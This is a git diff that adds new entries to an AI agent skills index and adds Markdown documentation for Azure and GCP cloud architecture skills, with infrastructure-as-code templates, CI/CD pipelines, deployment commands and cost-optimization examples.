diff --git a/.codex/skills-index.json b/.codex/skills-index.json index 6af38e8..17bd537 100644 --- a/.codex/skills-index.json +++ b/.codex/skills-index.json @@ -3,7 +3,7 @@ "name": "claude-code-skills", "description": "Production-ready skill packages for AI agents - Marketing, Engineering, Product, C-Level, PM, and RA/QM", "repository": "https://github.com/alirezarezvani/claude-skills", - "total_skills": 166, + "total_skills": 174, "skills": [ { "name": "contract-and-proposal-writer", @@ -209,6 +209,12 @@ "category": "engineering", "description": "Design AWS architectures for startups using serverless patterns and IaC templates. Use when asked to design serverless architecture, create CloudFormation templates, optimize AWS costs, set up CI/CD pipelines, or migrate to AWS. Covers Lambda, API Gateway, DynamoDB, ECS, Aurora, and cost optimization." }, + { + "name": "azure-cloud-architect", + "source": "../../engineering-team/azure-cloud-architect", + "category": "engineering", + "description": "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure costs, set up Azure DevOps pipelines, or migrate to Azure. Covers AKS, App Service, Azure Functions, Cosmos DB, and cost optimization." + }, { "name": "code-reviewer", "source": "../../engineering-team/code-reviewer", @@ -227,6 +233,12 @@ "category": "engineering", "description": ">" }, + { + "name": "gcp-cloud-architect", + "source": "../../engineering-team/gcp-cloud-architect", + "category": "engineering", + "description": "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure BigQuery pipelines, optimize GCP costs, or migrate to GCP. Covers Cloud Run, GKE, Cloud Functions, Cloud SQL, BigQuery, and cost optimization." + }, { "name": "google-workspace-cli", "source": "../../engineering-team/google-workspace-cli", @@ -251,6 +263,12 @@ "category": "engineering", "description": "Production-grade Playwright testing toolkit. Use when the user mentions Playwright tests, end-to-end testing, browser automation, fixing flaky tests, test migration, CI/CD testing, or test suites. Generate tests, fix flaky failures, migrate from Cypress/Selenium, sync with TestRail, run on BrowserStack. 55 templates, 3 agents, smart reporting." }, + { + "name": "security-pen-testing", + "source": "../../engineering-team/security-pen-testing", + "category": "engineering", + "description": "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation." + }, { "name": "self-improving-agent", "source": "../../engineering-team/self-improving-agent", @@ -345,7 +363,7 @@ "name": "tdd-guide", "source": "../../engineering-team/tdd-guide", "category": "engineering", - "description": "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit. Handles test generation from source code, coverage report parsing (LCOV/JSON/XML), quality scoring, and framework conversion for TypeScript, JavaScript, Python, and Java projects." + "description": "Test-driven development skill for writing unit tests, generating test fixtures and mocks, analyzing coverage gaps, and guiding red-green-refactor workflows across Jest, Pytest, JUnit, Vitest, and Mocha. Use when the user asks to write tests, improve test coverage, practice TDD, generate mocks or stubs, or mentions testing frameworks like Jest, pytest, or JUnit." }, { "name": "tech-stack-evaluator", @@ -389,6 +407,12 @@ "category": "engineering-advanced", "description": "Autonomous experiment loop that optimizes any file by a measurable metric. Inspired by Karpathy's autoresearch. The agent edits a target file, runs a fixed evaluation, keeps improvements (git commit), discards failures (git reset), and loops indefinitely. Use when: user wants to optimize code speed, reduce bundle/image size, improve test pass rate, optimize prompts, improve content quality (headlines, copy, CTR), or run any measurable improvement loop. Requires: a target file, an evaluation command that outputs a metric, and a git repo." }, + { + "name": "browser-automation", + "source": "../../engineering/browser-automation", + "category": "engineering-advanced", + "description": "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build web automation workflows. NOT for testing \u2014 use playwright-pro for that." + }, { "name": "changelog-generator", "source": "../../engineering/changelog-generator", @@ -515,6 +539,12 @@ "category": "engineering-advanced", "description": "Runbook Generator" }, + { + "name": "secrets-vault-manager", + "source": "../../engineering/secrets-vault-manager", + "category": "engineering-advanced", + "description": "Use when the user asks to set up secret management infrastructure, integrate HashiCorp Vault, configure cloud secret stores (AWS Secrets Manager, Azure Key Vault, GCP Secret Manager), implement secret rotation, or audit secret access patterns." + }, { "name": "skill-security-auditor", "source": "../../engineering/skill-security-auditor", @@ -527,6 +557,18 @@ "category": "engineering-advanced", "description": "Skill Tester" }, + { + "name": "spec-driven-workflow", + "source": "../../engineering/spec-driven-workflow", + "category": "engineering-advanced", + "description": "Use when the user asks to write specs before code, define acceptance criteria, plan features before implementation, generate tests from specifications, or follow spec-first development practices." + }, + { + "name": "sql-database-assistant", + "source": "../../engineering/sql-database-assistant", + "category": "engineering-advanced", + "description": "Use when the user asks to write SQL queries, optimize database performance, generate migrations, explore database schemas, or work with ORMs like Prisma, Drizzle, TypeORM, or SQLAlchemy." + }, { "name": "tech-debt-tracker", "source": "../../engineering/tech-debt-tracker", @@ -1000,6 +1042,12 @@ "source": "../../ra-qm-team/risk-management-specialist", "category": "ra-qm", "description": "Medical device risk management specialist implementing ISO 14971 throughout product lifecycle. Provides risk analysis, risk evaluation, risk control, and post-production information analysis. Use when user mentions risk management, ISO 14971, risk analysis, FMEA, fault tree analysis, hazard identification, risk control, risk matrix, benefit-risk analysis, residual risk, risk acceptability, or post-market risk." + }, + { + "name": "soc2-compliance", + "source": "../../ra-qm-team/soc2-compliance", + "category": "ra-qm", + "description": "Use when the user asks to prepare for SOC 2 audits, map Trust Service Criteria, build control matrices, collect audit evidence, perform gap analysis, or assess SOC 2 Type I vs Type II readiness." } ], "categories": { @@ -1014,12 +1062,12 @@ "description": "Executive leadership and advisory skills" }, "engineering": { - "count": 26, + "count": 29, "source": "../../engineering-team", "description": "Software engineering and technical skills" }, "engineering-advanced": { - "count": 31, + "count": 35, "source": "../../engineering", "description": "Advanced engineering skills - agents, RAG, MCP, CI/CD, databases, observability" }, @@ -1044,7 +1092,7 @@ "description": "Project management and Atlassian skills" }, "ra-qm": { - "count": 12, + "count": 13, "source": "../../ra-qm-team", "description": "Regulatory affairs and quality management skills" } diff --git a/.codex/skills/azure-cloud-architect b/.codex/skills/azure-cloud-architect new file mode 120000 index 0000000..c60202c --- /dev/null +++ b/.codex/skills/azure-cloud-architect @@ -0,0 +1 @@ +../../engineering-team/azure-cloud-architect \ No newline at end of file diff --git a/.codex/skills/browser-automation b/.codex/skills/browser-automation new file mode 120000 index 0000000..6c45eed --- /dev/null +++ b/.codex/skills/browser-automation @@ -0,0 +1 @@ +../../engineering/browser-automation \ No newline at end of file diff --git a/.codex/skills/gcp-cloud-architect b/.codex/skills/gcp-cloud-architect new file mode 120000 index 0000000..a424d26 --- /dev/null +++ b/.codex/skills/gcp-cloud-architect @@ -0,0 +1 @@ +../../engineering-team/gcp-cloud-architect \ No newline at end of file diff --git a/.codex/skills/secrets-vault-manager b/.codex/skills/secrets-vault-manager new file mode 120000 index 0000000..b229afe --- /dev/null +++ b/.codex/skills/secrets-vault-manager @@ -0,0 +1 @@ +../../engineering/secrets-vault-manager \ No newline at end of file diff --git a/.codex/skills/security-pen-testing b/.codex/skills/security-pen-testing new file mode 120000 index 0000000..17c191c --- /dev/null +++ b/.codex/skills/security-pen-testing @@ -0,0 +1 @@ +../../engineering-team/security-pen-testing \ No newline at end of file diff --git a/.codex/skills/soc2-compliance b/.codex/skills/soc2-compliance new file mode 120000 index 0000000..3eb5b31 --- /dev/null +++ b/.codex/skills/soc2-compliance @@ -0,0 +1 @@ +../../ra-qm-team/soc2-compliance \ No newline at end of file diff --git a/.codex/skills/spec-driven-workflow b/.codex/skills/spec-driven-workflow new file mode 120000 index 0000000..0b134e9 --- /dev/null +++ b/.codex/skills/spec-driven-workflow @@ -0,0 +1 @@ +../../engineering/spec-driven-workflow \ No newline at end of file diff --git a/.codex/skills/sql-database-assistant b/.codex/skills/sql-database-assistant new file mode 120000 index 0000000..bcc21a8 --- /dev/null +++ b/.codex/skills/sql-database-assistant @@ -0,0 +1 @@ +../../engineering/sql-database-assistant \ No newline at end of file diff --git a/docs/skills/engineering-team/azure-cloud-architect.md b/docs/skills/engineering-team/azure-cloud-architect.md new file mode 100644 index 0000000..36e7ed0 --- /dev/null +++ b/docs/skills/engineering-team/azure-cloud-architect.md @@ -0,0 +1,462 @@ +--- +title: "Azure Cloud Architect — Agent Skill & Codex Plugin" +description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw." +--- + +# Azure Cloud Architect + +
+:material-code-braces: Engineering - Core +:material-identifier: `azure-cloud-architect` +:material-github: Source +
+ +
+Install: claude /plugin install engineering-skills +
+ + +Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates. + +--- + +## Workflow + +### Step 1: Gather Requirements + +Collect application specifications: + +``` +- Application type (web app, mobile backend, data pipeline, SaaS, microservices) +- Expected users and requests per second +- Budget constraints (monthly spend limit) +- Team size and Azure experience level +- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001) +- Availability requirements (SLA, RPO/RTO) +- Region preferences (data residency, latency) +``` + +### Step 2: Design Architecture + +Run the architecture designer to get pattern recommendations: + +```bash +python scripts/architecture_designer.py \ + --app-type web_app \ + --users 10000 \ + --requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}' +``` + +**Example output:** + +```json +{ + "recommended_pattern": "app_service_web", + "service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"], + "estimated_monthly_cost_usd": 280, + "pros": ["Managed platform", "Built-in autoscale", "Deployment slots"], + "cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"] +} +``` + +Select from recommended patterns: +- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache +- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management +- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB +- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs + +See `references/architecture_patterns.md` for detailed pattern specifications. + +**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3. + +### Step 3: Generate IaC Templates + +Create infrastructure-as-code for the selected pattern: + +```bash +# Web app stack (Bicep) +python scripts/bicep_generator.py --arch-type web-app --output main.bicep +``` + +**Example Bicep output (core web app resources):** + +```bicep +@description('The environment name') +param environment string = 'dev' + +@description('The Azure region for resources') +param location string = resourceGroup().location + +@description('The application name') +param appName string = 'myapp' + +// App Service Plan +resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = { + name: '${environment}-${appName}-plan' + location: location + sku: { + name: 'P1v3' + tier: 'PremiumV3' + capacity: 1 + } + properties: { + reserved: true // Linux + } +} + +// App Service +resource appService 'Microsoft.Web/sites@2023-01-01' = { + name: '${environment}-${appName}-web' + location: location + properties: { + serverFarmId: appServicePlan.id + httpsOnly: true + siteConfig: { + linuxFxVersion: 'NODE|20-lts' + minTlsVersion: '1.2' + ftpsState: 'Disabled' + alwaysOn: true + } + } + identity: { + type: 'SystemAssigned' + } +} + +// Azure SQL Database +resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = { + name: '${environment}-${appName}-sql' + location: location + properties: { + administrators: { + azureADOnlyAuthentication: true + } + minimalTlsVersion: '1.2' + } +} + +resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = { + parent: sqlServer + name: '${appName}-db' + location: location + sku: { + name: 'GP_S_Gen5_2' + tier: 'GeneralPurpose' + } + properties: { + autoPauseDelay: 60 + minCapacity: json('0.5') + } +} +``` + +> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`. + +**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft. + +### Step 4: Review Costs + +Analyze estimated costs and optimization opportunities: + +```bash +python scripts/cost_optimizer.py \ + --config current_resources.json \ + --json +``` + +**Example output:** + +```json +{ + "current_monthly_usd": 2000, + "recommendations": [ + { "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" }, + { "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" }, + { "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" } + ], + "total_potential_savings_usd": 735 +} +``` + +Output includes: +- Monthly cost breakdown by service +- Right-sizing recommendations +- Reserved Instance and Savings Plan opportunities +- Potential monthly savings + +### Step 5: Configure CI/CD + +Set up Azure DevOps Pipelines or GitHub Actions with Azure: + +```yaml +# GitHub Actions — deploy Bicep to Azure +name: Deploy Infrastructure +on: + push: + branches: [main] + +permissions: + id-token: write + contents: read + +jobs: + deploy: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - uses: azure/login@v2 + with: + client-id: ${{ secrets.AZURE_CLIENT_ID }} + tenant-id: ${{ secrets.AZURE_TENANT_ID }} + subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} + + - uses: azure/arm-deploy@v2 + with: + resourceGroupName: rg-myapp-dev + template: ./infra/main.bicep + parameters: environment=dev +``` + +```yaml +# Azure DevOps Pipeline +trigger: + branches: + include: + - main + +pool: + vmImage: 'ubuntu-latest' + +steps: + - task: AzureCLI@2 + inputs: + azureSubscription: 'MyServiceConnection' + scriptType: 'bash' + scriptLocation: 'inlineScript' + inlineScript: | + az deployment group create \ + --resource-group rg-myapp-dev \ + --template-file infra/main.bicep \ + --parameters environment=dev +``` + +### Step 6: Security Review + +Validate security posture before production: + +- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code +- **Secrets**: Key Vault for all secrets, certificates, and connection strings +- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF +- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest +- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails +- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives + +**If deployment fails:** + +1. Check the deployment status: + ```bash + az deployment group show \ + --resource-group rg-myapp-dev \ + --name main \ + --query 'properties.error' + ``` +2. Review Activity Log for RBAC or policy errors. +3. Validate the Bicep template before deploying: + ```bash + az bicep build --file main.bicep + az deployment group validate \ + --resource-group rg-myapp-dev \ + --template-file main.bicep + ``` + +**Common failure causes:** +- RBAC permission errors — verify the deploying principal has Contributor on the resource group +- Resource provider not registered — run `az provider register --namespace Microsoft.Web` +- Naming conflicts — Azure resource names are often globally unique (storage accounts, web apps) +- Quota exceeded — request quota increase via Azure Portal > Subscriptions > Usage + quotas + +--- + +## Tools + +### architecture_designer.py + +Generates architecture pattern recommendations based on requirements. + +```bash +python scripts/architecture_designer.py \ + --app-type web_app \ + --users 50000 \ + --requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \ + --json +``` + +**Input:** Application type, expected users, JSON requirements +**Output:** Recommended pattern, service stack, cost estimate, pros/cons + +### cost_optimizer.py + +Analyzes Azure resource configurations for cost savings. + +```bash +python scripts/cost_optimizer.py --config resources.json --json +``` + +**Input:** JSON file with current Azure resource inventory +**Output:** Recommendations for: +- Idle resource removal +- VM and database right-sizing +- Reserved Instance purchases +- Storage tier transitions +- Unused public IPs and load balancers + +### bicep_generator.py + +Generates Bicep template scaffolds from architecture type. + +```bash +python scripts/bicep_generator.py --arch-type microservices --output main.bicep +``` + +**Output:** Production-ready Bicep templates with: +- Managed Identity (no passwords) +- Key Vault integration +- Diagnostic settings for Azure Monitor +- Network security groups +- Tags for cost allocation + +--- + +## Quick Start + +### Web App Architecture (< $100/month) + +``` +Ask: "Design an Azure web app for a startup with 5000 users" + +Result: +- App Service (B1 Linux) for the application +- Azure SQL Serverless for relational data +- Azure Blob Storage for static assets +- Front Door (free tier) for CDN and routing +- Key Vault for secrets +- Estimated: $40-80/month +``` + +### Microservices on AKS ($500-2000/month) + +``` +Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users" + +Result: +- AKS cluster with 3 node pools (system, app, jobs) +- API Management for gateway and rate limiting +- Cosmos DB for multi-model data +- Service Bus for async messaging +- Azure Monitor + Application Insights for observability +- Multi-zone deployment +``` + +### Serverless Event-Driven (< $200/month) + +``` +Ask: "Design an event-driven backend for processing orders" + +Result: +- Azure Functions (Consumption plan) for compute +- Event Grid for event routing +- Service Bus for reliable messaging +- Cosmos DB for order data +- Application Insights for monitoring +- Estimated: $30-150/month depending on volume +``` + +### Data Pipeline ($300-1500/month) + +``` +Ask: "Design a data pipeline for ingesting 10M events/day" + +Result: +- Event Hubs for ingestion +- Stream Analytics or Functions for processing +- Data Lake Storage Gen2 for raw data +- Synapse Analytics for warehouse +- Power BI for dashboards +``` + +--- + +## Input Requirements + +Provide these details for architecture design: + +| Requirement | Description | Example | +|-------------|-------------|---------| +| Application type | What you're building | SaaS platform, mobile backend | +| Expected scale | Users, requests/sec | 10k users, 100 RPS | +| Budget | Monthly Azure limit | $500/month max | +| Team context | Size, Azure experience | 3 devs, intermediate | +| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 | +| Availability | Uptime requirements | 99.9% SLA, 1hr RPO | + +**JSON Format:** + +```json +{ + "application_type": "saas_platform", + "expected_users": 10000, + "requests_per_second": 100, + "budget_monthly_usd": 500, + "team_size": 3, + "azure_experience": "intermediate", + "compliance": ["SOC2"], + "availability_sla": "99.9%" +} +``` + +--- + +## Anti-Patterns + +| Anti-Pattern | Why It Fails | Do This Instead | +|---|---|---| +| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax | +| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings | +| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs | +| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration | +| Over-provisioning "just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly | +| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload | +| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name | +| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively | + +--- + +## Output Formats + +### Architecture Design + +- Pattern recommendation with rationale +- Service stack diagram (ASCII) +- Monthly cost estimate and trade-offs + +### IaC Templates + +- **Bicep**: Recommended — first-party, module support, clean syntax +- **ARM JSON**: Generated from Bicep when needed +- **Terraform HCL**: Multi-cloud compatible using azurerm provider + +### Cost Analysis + +- Current spend breakdown with optimization recommendations +- Priority action list (high/medium/low) and implementation checklist + +--- + +## Reference Documentation + +| Document | Contents | +|----------|----------| +| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region | +| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking | +| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR | diff --git a/docs/skills/engineering-team/gcp-cloud-architect.md b/docs/skills/engineering-team/gcp-cloud-architect.md new file mode 100644 index 0000000..58b51d8 --- /dev/null +++ b/docs/skills/engineering-team/gcp-cloud-architect.md @@ -0,0 +1,429 @@ +--- +title: "GCP Cloud Architect — Agent Skill & Codex Plugin" +description: "Design GCP architectures for startups and enterprises. Use when asked to design Google Cloud infrastructure, deploy to GKE or Cloud Run, configure. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw." +--- + +# GCP Cloud Architect + +
+:material-code-braces: Engineering - Core +:material-identifier: `gcp-cloud-architect` +:material-github: Source +
+ +
+Install: claude /plugin install engineering-skills +
+ + +Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code templates. + +--- + +## Workflow + +### Step 1: Gather Requirements + +Collect application specifications: + +``` +- Application type (web app, mobile backend, data pipeline, SaaS) +- Expected users and requests per second +- Budget constraints (monthly spend limit) +- Team size and GCP experience level +- Compliance requirements (GDPR, HIPAA, SOC 2) +- Availability requirements (SLA, RPO/RTO) +``` + +### Step 2: Design Architecture + +Run the architecture designer to get pattern recommendations: + +```bash +python scripts/architecture_designer.py --input requirements.json +``` + +**Example output:** + +```json +{ + "recommended_pattern": "serverless_web", + "service_stack": ["Cloud Storage", "Cloud CDN", "Cloud Run", "Firestore", "Identity Platform"], + "estimated_monthly_cost_usd": 30, + "pros": ["Low ops overhead", "Pay-per-use", "Auto-scaling", "No cold starts on Cloud Run min instances"], + "cons": ["Vendor lock-in", "Regional limitations", "Eventual consistency with Firestore"] +} +``` + +Select from recommended patterns: +- **Serverless Web**: Cloud Storage + Cloud CDN + Cloud Run + Firestore +- **Microservices on GKE**: GKE Autopilot + Cloud SQL + Memorystore + Cloud Pub/Sub +- **Serverless Data Pipeline**: Pub/Sub + Dataflow + BigQuery + Looker +- **ML Platform**: Vertex AI + Cloud Storage + BigQuery + Cloud Functions + +See `references/architecture_patterns.md` for detailed pattern specifications. + +**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3. + +### Step 3: Estimate Cost + +Analyze estimated costs and optimization opportunities: + +```bash +python scripts/cost_optimizer.py --resources current_setup.json --monthly-spend 2000 +``` + +**Example output:** + +```json +{ + "current_monthly_usd": 2000, + "recommendations": [ + { "action": "Right-size Cloud SQL db-custom-4-16384 to db-custom-2-8192", "savings_usd": 380, "priority": "high" }, + { "action": "Purchase 1-yr committed use discount for GKE nodes", "savings_usd": 290, "priority": "high" }, + { "action": "Move Cloud Storage objects >90 days to Nearline", "savings_usd": 75, "priority": "medium" } + ], + "total_potential_savings_usd": 745 +} +``` + +Output includes: +- Monthly cost breakdown by service +- Right-sizing recommendations +- Committed use discount opportunities +- Sustained use discount analysis +- Potential monthly savings + +Use the [GCP Pricing Calculator](https://cloud.google.com/products/calculator) for detailed estimates. + +### Step 4: Generate IaC + +Create infrastructure-as-code for the selected pattern: + +```bash +python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1 +``` + +**Example Terraform HCL output (Cloud Run + Firestore):** + +```hcl +terraform { + required_providers { + google = { + source = "hashicorp/google" + version = "~> 5.0" + } + } +} + +provider "google" { + project = var.project_id + region = var.region +} + +variable "project_id" { + description = "GCP project ID" + type = string +} + +variable "region" { + description = "GCP region" + type = string + default = "us-central1" +} + +resource "google_cloud_run_v2_service" "api" { + name = "${var.environment}-${var.app_name}-api" + location = var.region + + template { + containers { + image = "gcr.io/${var.project_id}/${var.app_name}:latest" + resources { + limits = { + cpu = "1000m" + memory = "512Mi" + } + } + env { + name = "FIRESTORE_PROJECT" + value = var.project_id + } + } + scaling { + min_instance_count = 0 + max_instance_count = 10 + } + } +} + +resource "google_firestore_database" "default" { + project = var.project_id + name = "(default)" + location_id = var.region + type = "FIRESTORE_NATIVE" +} +``` + +**Example gcloud CLI deployment:** + +```bash +# Deploy Cloud Run service +gcloud run deploy my-app-api \ + --image gcr.io/$PROJECT_ID/my-app:latest \ + --region us-central1 \ + --platform managed \ + --allow-unauthenticated \ + --memory 512Mi \ + --cpu 1 \ + --min-instances 0 \ + --max-instances 10 + +# Create Firestore database +gcloud firestore databases create --location=us-central1 +``` + +> Full templates including Cloud CDN, Identity Platform, IAM, and Cloud Monitoring are generated by `deployment_manager.py` and also available in `references/architecture_patterns.md`. + +### Step 5: Configure CI/CD + +Set up automated deployment with Cloud Build or GitHub Actions: + +```yaml +# cloudbuild.yaml +steps: + - name: 'gcr.io/cloud-builders/docker' + args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA', '.'] + + - name: 'gcr.io/cloud-builders/docker' + args: ['push', 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA'] + + - name: 'gcr.io/google.com/cloudsdktool/cloud-sdk' + entrypoint: gcloud + args: + - 'run' + - 'deploy' + - 'my-app-api' + - '--image=gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA' + - '--region=us-central1' + - '--platform=managed' + +images: + - 'gcr.io/$PROJECT_ID/my-app:$COMMIT_SHA' +``` + +```bash +# Connect repo and create trigger +gcloud builds triggers create github \ + --repo-name=my-app \ + --repo-owner=my-org \ + --branch-pattern="^main$" \ + --build-config=cloudbuild.yaml +``` + +### Step 6: Security Review + +Verify security configuration: + +```bash +# Review IAM bindings +gcloud projects get-iam-policy $PROJECT_ID --format=json + +# Check service account permissions +gcloud iam service-accounts list --project=$PROJECT_ID + +# Verify VPC Service Controls (if applicable) +gcloud access-context-manager perimeters list --policy=$POLICY_ID +``` + +**Security checklist:** +- IAM roles follow least privilege (prefer predefined roles over basic roles) +- Service accounts use Workload Identity for GKE +- VPC Service Controls configured for sensitive APIs +- Cloud KMS encryption keys for customer-managed encryption +- Cloud Audit Logs enabled for all admin activity +- Organization policies restrict public access +- Secret Manager used for all credentials + +**If deployment fails:** + +1. Check the failure reason: + ```bash + gcloud run services describe my-app-api --region us-central1 + gcloud logging read "resource.type=cloud_run_revision" --limit=20 + ``` +2. Review Cloud Logging for application errors. +3. Fix the configuration or container image. +4. Redeploy: + ```bash + gcloud run deploy my-app-api --image gcr.io/$PROJECT_ID/my-app:latest --region us-central1 + ``` + +**Common failure causes:** +- IAM permission errors -- verify service account roles and `--allow-unauthenticated` flag +- Quota exceeded -- request quota increase via IAM & Admin > Quotas +- Container startup failure -- check container logs and health check configuration +- Region not enabled -- enable the required APIs with `gcloud services enable` + +--- + +## Tools + +### architecture_designer.py + +Recommends GCP services based on workload requirements. + +```bash +python scripts/architecture_designer.py --input requirements.json --output design.json +``` + +**Input:** JSON with app type, scale, budget, compliance needs +**Output:** Recommended pattern, service stack, cost estimate, pros/cons + +### cost_optimizer.py + +Analyzes GCP resources for cost savings. + +```bash +python scripts/cost_optimizer.py --resources inventory.json --monthly-spend 5000 +``` + +**Output:** Recommendations for: +- Idle resource removal +- Machine type right-sizing +- Committed use discounts +- Storage class transitions +- Network egress optimization + +### deployment_manager.py + +Generates gcloud CLI deployment scripts and Terraform configurations. + +```bash +python scripts/deployment_manager.py --app-name my-app --pattern serverless_web --region us-central1 +``` + +**Output:** Production-ready deployment scripts with: +- Cloud Run or GKE deployment +- Firestore or Cloud SQL setup +- Identity Platform configuration +- IAM roles with least privilege +- Cloud Monitoring and Logging + +--- + +## Quick Start + +### Web App on Cloud Run (< $100/month) + +``` +Ask: "Design a serverless web backend for a mobile app with 1000 users" + +Result: +- Cloud Run for API (auto-scaling, no cold start with min instances) +- Firestore for data (pay-per-operation) +- Identity Platform for authentication +- Cloud Storage + Cloud CDN for static assets +- Estimated: $15-40/month +``` + +### Microservices on GKE ($500-2000/month) + +``` +Ask: "Design a scalable architecture for a SaaS platform with 50k users" + +Result: +- GKE Autopilot for containerized workloads +- Cloud SQL (PostgreSQL) with read replicas +- Memorystore (Redis) for session caching +- Cloud CDN for global delivery +- Cloud Build for CI/CD +- Multi-zone deployment +``` + +### Serverless Data Pipeline + +``` +Ask: "Design a real-time analytics pipeline for event data" + +Result: +- Pub/Sub for event ingestion +- Dataflow (Apache Beam) for stream processing +- BigQuery for analytics and warehousing +- Looker for dashboards +- Cloud Functions for lightweight transforms +``` + +### ML Platform + +``` +Ask: "Design a machine learning platform for model training and serving" + +Result: +- Vertex AI for training and prediction +- Cloud Storage for datasets and model artifacts +- BigQuery for feature store +- Cloud Functions for preprocessing triggers +- Cloud Monitoring for model drift detection +``` + +--- + +## Input Requirements + +Provide these details for architecture design: + +| Requirement | Description | Example | +|-------------|-------------|---------| +| Application type | What you're building | SaaS platform, mobile backend | +| Expected scale | Users, requests/sec | 10k users, 100 RPS | +| Budget | Monthly GCP limit | $500/month max | +| Team context | Size, GCP experience | 3 devs, intermediate | +| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 | +| Availability | Uptime requirements | 99.9% SLA, 1hr RPO | + +**JSON Format:** + +```json +{ + "application_type": "saas_platform", + "expected_users": 10000, + "requests_per_second": 100, + "budget_monthly_usd": 500, + "team_size": 3, + "gcp_experience": "intermediate", + "compliance": ["SOC2"], + "availability_sla": "99.9%" +} +``` + +--- + +## Output Formats + +### Architecture Design + +- Pattern recommendation with rationale +- Service stack diagram (ASCII) +- Monthly cost estimate and trade-offs + +### IaC Templates + +- **Terraform HCL**: Production-ready Google provider configs +- **gcloud CLI**: Scripted deployment commands +- **Cloud Build YAML**: CI/CD pipeline definitions + +### Cost Analysis + +- Current spend breakdown with optimization recommendations +- Priority action list (high/medium/low) and implementation checklist + +--- + +## Reference Documentation + +| Document | Contents | +|----------|----------| +| `references/architecture_patterns.md` | 6 patterns: serverless, GKE microservices, three-tier, data pipeline, ML platform, multi-region | +| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging | +| `references/best_practices.md` | Naming, labels, IAM, networking, monitoring, disaster recovery | diff --git a/docs/skills/engineering-team/index.md b/docs/skills/engineering-team/index.md index 9e804b5..de06022 100644 --- a/docs/skills/engineering-team/index.md +++ b/docs/skills/engineering-team/index.md @@ -1,13 +1,13 @@ --- title: "Engineering - Core Skills — Agent Skills & Codex Plugins" -description: "41 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw." +description: "44 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw." ---
# :material-code-braces: Engineering - Core -

41 skills in this domain

+

44 skills in this domain

